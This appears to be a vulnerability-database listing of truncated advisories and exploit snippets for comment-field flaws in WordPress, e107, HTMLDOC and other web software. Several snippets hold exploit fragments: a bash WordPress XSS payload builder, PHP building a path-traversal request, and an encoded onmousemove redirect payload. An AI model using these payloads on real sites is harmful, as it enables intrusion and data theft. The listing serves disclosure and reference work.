Buffer overflow

Buffer overflow in the setpagesize function in util.cxx in HTMLDOC 1.8.27 and earlier allows context-dependent attackers to execute arbitrary code via a long MEDIA SIZE comment. NOTE: it was later reported that there were additional vectors in htmllib.cxx and ps-pdf.cxx using an AFM font file wit...

LiveStreet Cross Site Scripting

============================================== LiveStreet Xss inj3ct0r.com Vulnerable Exploit ============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //...

CVE-2008-7060

Multiple cross-site scripting XSS vulnerabilities in One-News Beta 2 allow remote attackers to inject arbitrary HTML and web script via the 1 title or 2 content parameters in a news item to add.php, and the 3 itemnum, 4 author, or 5 comment parameters in a comment to index.php. NOTE: vectors 1 an...

CVE-2008-7039

Cross-site scripting XSS vulnerability in admin/comments.php in Gelato CMS 0.95 allows remote attackers to inject arbitrary web script or HTML via the content parameter in a comment. NOTE: some of these details are obtained from third party information...

CVE-2009-2851

Cross-site scripting XSS vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL...

DEBIAN-CVE-2009-2851

Cross-site scripting XSS vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL...

Cross site scripting

Cross-site scripting XSS vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL...

CVE-2009-2851

Cross-site scripting XSS vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL...

Ignition 1.2 (comment) Remote Code Injection Vulnerability

No description provided by source. Ignition Remote Code Execution AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm Sina Yazdanmehr Download :...

WordPress 2.8.1 Cross Site Scripting

!/bin/bash echo "wp281.quickprz // iso^kpsbr" SITE=$1 COMMENT=$2 MESSAGE="h4x0riZed by the superfreakaz0rz" if "X$SITE" = "X" ; then echo "$0 postID" echo "f.e. $0 www.worstpress.eu" exit fi if "X$POSTID" = "X" ; then POSTID=1 fi echo "+ building payload" WHERE="title" can also be 'content'...

e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit

Exploit for unknown platform in category web applications ===================================================================== e107 Plugin mygallery 2.4.1 readfile Local File Disclosure Exploit ===================================================================== Web 2 XPL : File 2 Read : i...

e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure

Web 2 XPL : File 2 Read : "; if $POST'xpl' $data .= "GET /$vuln$trasv$file HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "C...

e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure

e107 Plugin mygallery 2.4.1 - readfile Local File Disclosure Web 2 XPL : File 2 Read : "; if $POST'xpl' $data .= "GET /$vuln$trasv$file HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data...

wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net

Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...

CVE-2009-2431

WordPress 2.7.1 places the username of a post's author in an HTML comment, which allows remote attackers to obtain sensitive information by reading the HTML source...

CVE-2009-2431

WordPress 2.7.1 places the username of a post's author in an HTML comment, which allows remote attackers to obtain sensitive information by reading the HTML source...

CVE-2009-2431

CVE-2009-2431 affects WordPress 2.7.1, where the author’s username is placed in an HTML comment. This allows remote attackers to read the HTML source and harvest author identifiers (sensitive information). The underlying issue is information disclosure via HTML comments in the post output. Remedi...

CVE-2009-2431

WordPress 2.7.1 places the username of a post's author in an HTML comment, which allows remote attackers to obtain sensitive information by reading the HTML source...

CVE-2009-2431

WordPress 2.7.1 places the username of a post's author in an HTML comment, which allows remote attackers to obtain sensitive information by reading the HTML source...

TalkBack 2.3.14 Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications =============================================== TalkBack 2.3.14 Multiple Remote Vulnerabilities =============================================== Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip Script : talkback V...